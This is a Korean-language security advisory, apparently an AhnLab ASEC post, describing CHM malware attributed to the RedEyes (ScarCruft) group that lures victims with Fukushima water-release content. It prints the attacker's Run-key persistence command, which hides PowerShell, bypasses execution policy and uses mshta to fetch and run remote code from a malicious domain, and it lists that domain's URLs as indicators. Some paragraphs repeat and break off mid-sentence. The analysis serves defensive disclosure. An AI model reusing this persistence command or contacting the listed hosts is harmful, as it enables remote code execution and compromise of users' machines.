후쿠시마 오염수 방류 내용을 이용한 CHM 악성코드 : RedEyes(ScarCruft)
Contents
ASEC(AhnLab Security Emergency response Center) 분석팀은 RedEyes 공격 그룹이 제작한 것으로 추정되는 CHM 악성코드가 최근 다시 유포되고 있는 정황을 포착하였다. 최근 유포 중인 CHM 악성코드는 지난 3월에 소개한 “국내 금융 기업 보안 메일을 사칭한 CHM 악성코드”[1] 와 유사한 방식으로 동작하며, 이번에도 RedEyes 그룹의 M2RAT 악성코드 공격 과정 중 “2.3. 지속성 유지 (Persistence)”[2] 과정에서 사용된 명령어가 동일하게 확인되었다.
이번 공격에는 후쿠시마 오염수 방류 내용을 이용하였는데 공격자는 국내 이슈가 되는 주제를 통해 사용자의 궁금증을 유발하여 악성 파일을 실행하도록 유도한다. 해당 내용은 [그림 1] 과 같이, CHM 악성코드 실행 시 생성되는 도움말 창에서 확인할 수 있다.
해당 과정에서 실행되는 악성 스크립트는 [그림 2] 와 같다. 기존에는 mshta 명령어를 CHM 파일(hh.exe)에서 바로 실행하던 방식이였지만, 최근 유포되는 파일에서는 RUN 키에 해당 명령어를 등록하여 시스템이 재부팅될 때 실행하도록 변경되었다.
- RUN 키 등록
레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
값 이름 : fGZtm
값 : c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html
RUN 키에 …
이번 공격에는 후쿠시마 오염수 방류 내용을 이용하였는데 공격자는 국내 이슈가 되는 주제를 통해 사용자의 궁금증을 유발하여 악성 파일을 실행하도록 유도한다. 해당 내용은 [그림 1] 과 같이, CHM 악성코드 실행 시 생성되는 도움말 창에서 확인할 수 있다.
해당 과정에서 실행되는 악성 스크립트는 [그림 2] 와 같다. 기존에는 mshta 명령어를 CHM 파일(hh.exe)에서 바로 실행하던 방식이였지만, 최근 유포되는 파일에서는 RUN 키에 해당 명령어를 등록하여 시스템이 재부팅될 때 실행하도록 변경되었다.
- RUN 키 등록
레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
값 이름 : fGZtm
값 : c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html
RUN 키에 …
IoC
52f71fadf0ea5ffacd753e83a3d0af1a
http://navercorp.ru/dashboard/image/202302/4.html
http://navercorp.ru/dashboard/image/202302/com.php
http://navercorp.ru/dashboard/image/202302/4.html
http://navercorp.ru/dashboard/image/202302/com.php